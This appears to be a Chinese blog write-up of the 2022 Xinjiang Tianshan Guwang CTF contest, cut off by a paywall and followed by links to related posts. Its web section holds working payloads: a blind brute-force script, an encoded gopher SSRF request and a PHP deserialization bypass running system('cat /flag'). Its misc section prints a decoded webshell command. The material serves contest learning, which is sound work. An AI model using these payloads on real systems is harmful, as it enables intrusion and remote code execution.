2022年新疆天山固网杯网络安全技能竞赛wp

最新推荐文章于 2025-09-28 12:13:45 发布
原创 最新推荐文章于 2025-09-28 12:13:45 发布 · 4.8k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #php #安全

2022年新疆天山固网杯网络安全技能竞赛

有些卷的比赛,没想到最后一秒能被反超…

签到

1-1

直接url解密
1-2
图片解密
winhex直接出

web

web1:盲注猜文件

import string
import requests
url="http://127.0.0.1/?g="
strings=string.digits+string.ascii_letters+"{}"
print(strings)
#长度限制为四位
already_know="DASCTF{"
start="TF{"
while True:
    for i in strings:
        payload=start+i
        r=requests.get(url+payload)
        if "not" not in r.text:
            already_know+=i
            print(already_know)
            start=start[1:]+i

web2:ssrf

POST /?a=ls HTTP/1.1
Host: 172.73.23.100
Connection: close
Referer: dasctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

dasctf=flag

直接打就ok

http://43.138.39.179:20000/?url=gopher://172.73.23.100:80/_%2550%254f%2553%2554%2520%252f%253f%2561%253d%256c%2573%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2537%2532%252e%2537%2533%252e%2532%2533%252e%2531%2530%2530%250d%250a%2543%256f%256e%256e%2565%2563%2574%2569%256f%256e%253a%2520%2563%256c%256f%2573%2565%250d%250a%2552%2565%2566%2565%2572%2565%2572%253a%2520%2564%2561%2573%2563%2574%2566%252e%2563%256f%256d%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2531%2531%250d%250a%250d%250a%2564%2561%2573%2563%2574%2566%253d%2566%256c%2561%2567

web3:

/hint.php?id=9223372036854661293&file=php://filter/read=convert.base64-encode/resource=index

读index源码

<?php
error_reporting(0);
class Evil{
   
   
    public $flag = 1;
    public function __wakeup()
    {
   
   
        $this->flag = 0;
    }
    public function __destruct()
    {
   
   
        if($this->flag == 1)
        {
   
   
            echo("How you did it?");
            $xux = file_get_contents($_GET['xux']);
            create_function("",$xux);
        }
        else{
   
   
            die("nonono");
        }
    }

}
$o = $_GET['o'];
if(isset($o))
{
   
   
    unserialize($o);
}

不能用cve绕
参照这个绕过__wakeup
https://bugs.php.net/bug.php?id=81151

/index.php?o=C%3A4%3A%22Evil%22%3A2%3A%7Bs%3A4%3A%22flag%22%3Bi%3A1%3B%7D&xux=data://text/plain,;}system("cat+/flag");/*

获得flag

misc

misc1
1.把png高度改一下就看到压缩包密码
2.解压出来那个改成.ppt

misc2

打开流量,发现chr流量特征,解密

@ini_set("display_errors","0");@set_time_limit(0);functionasenc($out){return@base64_encode($out);};functionasoutput(){$output=ob_get_contents();ob_end_clean();echo"5b3"."ed02";echo@asenc($output);echo"f46cf"."2253ac";}ob_start();try{$D=base64_decode(substr($_POST["vb00375a68a239"],2));$F=@opendir($D);if($F==NULL){echo("ERROR://PathNotFoundOrNoPermission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-dH:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="	".$T."	".@filesize($P)."	".$E."
";if(@is_dir($P))$M.=$N."/".$R;else$L.=$N.$R;}echo$M.$L;@closedir($F);};}catch(Exception$e){echo"ERROR://".$e->getMessage();};asoutput();die();

发现会对结果进行输出

echo"5b3"."ed02";echo@asenc($output);echo"f46cf"."2253ac";

去掉头尾进行部分解密,发现所有的都输出的目录

image-20220626145018466

直接解密最后几个,发现有读到a.txt。

image-20220626145229045

这里翻看了很久a.txt都没发现,发现在chr的末尾会读一串字符串,输出方式是把内容base64加密后,添加两位,上面解密的代码也有

$D=base64_decode(substr($_POST["vb00375a68a239"],2));

其中内容是把部分字符串写入到a.txt中。

image-20220626145454515

这里全部手工提取出来,发现每隔两个一个重复。写个脚本,直接解密,看到是base32编码,再解密是base64,再解密得到flag。这里直接写了个脚本


import base64

data = []
with open('./1.txt','r') as f:
    for i in f.readlines():
        data.append(base64.b64decode(str(i[2:])))

flag = ''
for i in range(0,len(data),2):
    flag += str(data[i]).split(' ')[3]

print(base64.b64decode(base64.b32decode(flag)))

# KJCUMVCRGFJEOZL2JJWE2V2RGNMW2SLXJZLVCM2ONJWGUTLNJZVU2VCBPBHFIZDIJZVFSMCOIRSGQTKHKJVWMUJ5HU======

image-20220626145738470

逆向

RE1
简单的汇编代码

a=[97,56,47,56,53,99,53,100,97,100,99,97,98,99,53,101,56,50,55,50,48,53,55,98,96,55,56,55,55,48,52,98]
for i in a:
        print(chr(i+1),end='')

RE2

PEinM

不断调试跟踪到main函数

__int64 sub_40175D()
{
   
   
  int v0; // eax
  __int64 v2[11]; // [rsp+20h] [rbp-70h] BYREF
  int v3; // [rsp+78h] [rbp-18h]
  int v4; // [rsp+7Ch] [rbp-14h]
  __int64 v5; // [rsp+80h] [rbp-10h]
  int j; // [rsp+88h] [rbp-8h]
  int i; // [rsp+8Ch] [rbp-4h]

  ((void (*)(void))unk_401970)();
  v5 = ((__int64 (__fastcall *
最低0.47元/天 解锁文章
2022网络安全国赛内存取证WP
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
07-18 2591
2022网络安全国赛内存取证WP
2024全国职业技能大赛-网络安全赛题解析总结⑤(超详细)_全国网络安全行业职业技能大赛
2401_84248681的博客
04-28 1019
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!2.请根据大赛所提供的比赛环境,检查所列的硬件设备、软件清单、材料清单是否齐全,计算机设备是否能正常使用。5.比赛完成后,比赛设备、软件和赛题请保留在座位上,禁止将比赛所用的所有物品(包括试卷等)带离赛场。对于有1-3工作经验,想要跳槽的朋友来说,也是很好的温习资料!内容实在太多,不一一截图了。
自治区“工会”暨“天山固网-2025”网络安全技能竞赛初赛 题目分享
最新发布
xiaozhi_z的博客
09-28 900
本资料仅限‌‌,禁止用于商业培训或竞赛押题。
2023新疆天山固网网络安全技能竞赛-部分wp
Lulzcart的博客
10-28 2081
发现有test.php等文件,进行查看cat。
2022天工CTF---crypto1 wp
3tefanie的博客
07-20 1657
【大概世间有一种自讨苦吃,叫做设身处地,处处为他人着想。】
2022-第六届”蓝帽“全国大学生网络安全技能大赛 wp(WriteUp)
一位热爱网安的年轻人的博客
07-10 1189
第六届”蓝帽“全国大学生网络安全技能大赛 wp
天山第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
Laffrey的专栏
10-05 1312
天山第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
huwang超详细的wp(护网
Peanuts
10-18 1171
护网pwn题huwang超详细wp 比赛结束快一个星期了,复现了一下这道题,借鉴了一下网上的wp发现大佬们写的都很简略,所以这里写一个详细的wp供小白们学习。 首发于安恒网络空间安全讲武微信公众号 简单记录一些小的知识点 来自于csapp: int open(char *filename,int flags,modet mode)这里主要关注flags参数  这里我们将会用到的...
天山第二届新疆工业互联网安全大赛-真题
10-04
天山第二届新疆工业互联网安全大赛-真题】是一个聚焦于网络安全竞赛,主要针对工业互联网领域的安全问题。CTF(Capture The Flag)是一种常见的网络安全竞赛形式,参赛者需要通过解谜、破解、分析等手段,解决...
【2025御网】线下半决赛 WriteUp
2401_87471430的博客
07-13 1031
本文章编写为2025御网高职组线下半决赛WriteUp,整体来说不是很难,想爆0其实也挺难的,半决赛CTF解题期间,排名没掉过前三。吐槽一下,就是零食只有面包太单一了,还有就是中午吃华莱士汉堡是什么鬼,是想让选手窜吗。。。今杂项出的这四道题,5分钟就ak了,四道题都有血放010里可以看到是16进制转成字符直接出flag用随波逐流和赛博厨师(CyberChef)都能直接出点开第一眼就想到了是字频分析,直接用工具一把嗦了直接字频统计得到的是颠倒的,需要颠倒回去将给的图片放到随波里,就可以得到修复好宽高的二维
2022淮安市第十七届职业学校技能大赛网络安全题解WP
明裕学长的博客
11-04 2905
这题没要求版本号,只要求端口号,可以用-sS,要全面再加上-p-nmap-p--sSFlag[22;111;6000]2、将服务器中tmp文件夹下的字典下载至本地,并将字典中最后一位用户名作为flag提交;3、应用工具获取服务器中黑客账户的密码。并将黑客的密码作为flag提交;4、在服务器中查看sudo软件的版本,将sudo的版本号作为flag提交;5、在服务器中登录恶意用户,查看恶意用户在服务器中输入的第一条指令,将指令作为flag提交;先对恶意用户进行爆破。
BUUCTF学习(7): 随便注,固网
初尘屿风的博客
10-16 1334
-
2023中国工业互联网安全大赛wp
monster663的博客
07-07 3909
2023中国工业互联网安全大赛决赛WP
2025网安赛备战倒计时!这30+赛事错过即出局!_2025江苏省网络安全知识竞赛
jennycisp的博客
03-26 1839
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
webshell流量一键解密——webshellDecrypt
土豆的博客
10-19 9642
支持常见webshell流量一键解密(完美兼容php)、AES专项解密(内置50wKey爆破)、各类单项解密(Base64、Rot13、strRev、Chr等)、自定义Js解密
2025网安赛备战倒计时!这30+赛事错过即出局!
QIANDXX的博客
03-30 1084
2025网络安全赛事已进入“抢位战”阶段!从集团内训到国际擂台,从行业特训到高校练兵,赛事数量激增、技术门槛飙升。技术迭代速度远超预期,竞争格局加速分化——若想站稳脚跟,现在就必须锁定赛道、全力冲刺!文末附独家备赛资源包,助你抢占先机!一、集团级:内部晋升“绿色通道”网络与信息安全技能大赛(2025)主办:集团公司网络与信息安全部、集团工会赛道:网络攻防、数据安全双赛道,聚焦企业内部实战场景。焦虑点:2024优胜者80%获管理层晋升资格,2025参赛资格或仅限内部推荐!
SHCTF 未出题目复盘
arcuied
11-01 389
逆序得到中间那串像b64解码解不出什么 猜测还要rotateEmxh 和 flag编码后的前几位比较接近考虑大写字母需要继续偏移对大写字母处理完后得到解码得对比flag{Y0U_base64编码和解出的前12位数字也得继续偏移解b64得到flag。
内部赛-2022第二届网络安全攻防大赛个人赛决赛 WriteUp.
07-24 346
题目给了两个pyc文件。用uncompyle和pycdc还原效果不一样。可以看字节码再手动还原关键代码。下面给出最终还原结果及注释。chal分析可知起点第一列,终点最后一列。vshell还原全部分析了,发现没有分析的必要,可以看字符猜起点,终点位置。pyc中找到上下左右即可以,不需要过多的分析。直接DFS算法解题。使用pwntools连续回答问题。main.py。
评论 9
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值